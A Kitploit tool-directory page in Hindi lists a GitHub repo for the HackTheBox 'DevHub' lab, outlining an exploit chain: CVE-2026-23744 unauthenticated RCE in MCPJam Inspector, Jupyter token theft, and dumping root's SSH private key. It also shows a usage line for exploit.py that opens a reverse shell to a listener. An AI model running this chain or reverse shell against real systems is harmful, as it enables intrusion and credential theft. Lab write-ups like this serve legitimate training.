Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
HTB-DevHub — CVE-2026-23744 RCE + Privilege Escalation | Kitploit
उपकरण/GitHubGitHub/thisisish/htb-devhub
विशेषाधिकार वृद्धिटोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubthisisish/htb-devhub

HTB-DevHub

CVE-2026-23744 RCE + Privilege Escalation

रिपॉजिटरी देखें
32 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

HackTheBox — DevHub

CVE-2026-23744 | MCPJam Inspector अप्रमाणित RCE

कठिनाई: मध्यम
OS: Linux


शोषण श्रृंखला

root@kitploit:~
┌─────────────────────────────────────────────────────┐
│                 CVE-2026-23744                      │
│     अप्रमाणित POST → /api/mcp/connect                │
└─────────────────────┬───────────────────────────────┘
                      ↓
             mcp-dev के रूप में शेल
                      ↓
┌─────────────────────────────────────────────────────┐
│     portfwd 8888 → Jupyter Notebook टोकन ग्रैब      │
└─────────────────────┬───────────────────────────────┘
                      ↓
         ब्राउज़र → http://127.0.0.1:8888
                      ↓
          नोटबुक सेल के माध्यम से analyst के रूप में शेल
                      ↓
┌─────────────────────────────────────────────────────┐
│       cat /opt/opsmcp/server.py                     │
└─────────────────────┬───────────────────────────────┘
                      ↓
         portfwd 5000 → OPSMCP API
                      ↓
                      ↓
         /root/.ssh/id_rsa डंप किया गया
                      ↓
┌─────────────────────────────────────────────────────┐
│       ssh -i root_id_rsa [email protected]            │
│                   ROOT ★                            │
└─────────────────────────────────────────────────────┘

फ़ाइलें

फ़ाइलविवरण
exploit.pyCVE-2026-23744 RCE शोषण जिसमें भेद्यता जांच है
enum.pyस्थानीय गणना — Jupyter, MCP, Python, privesc

उपयोग

root@kitploit:~
# Exploit
python3 exploit.py -t devhub.htb -l <your_ip> -r 4444

# Enumeration (once on box)
python3 enum.py --section all
python3 enum.py --section jupyter

अस्वीकरण

केवल शैक्षिक उद्देश्यों और अधिकृत परीक्षण के लिए।

टूल डाउनलोड करें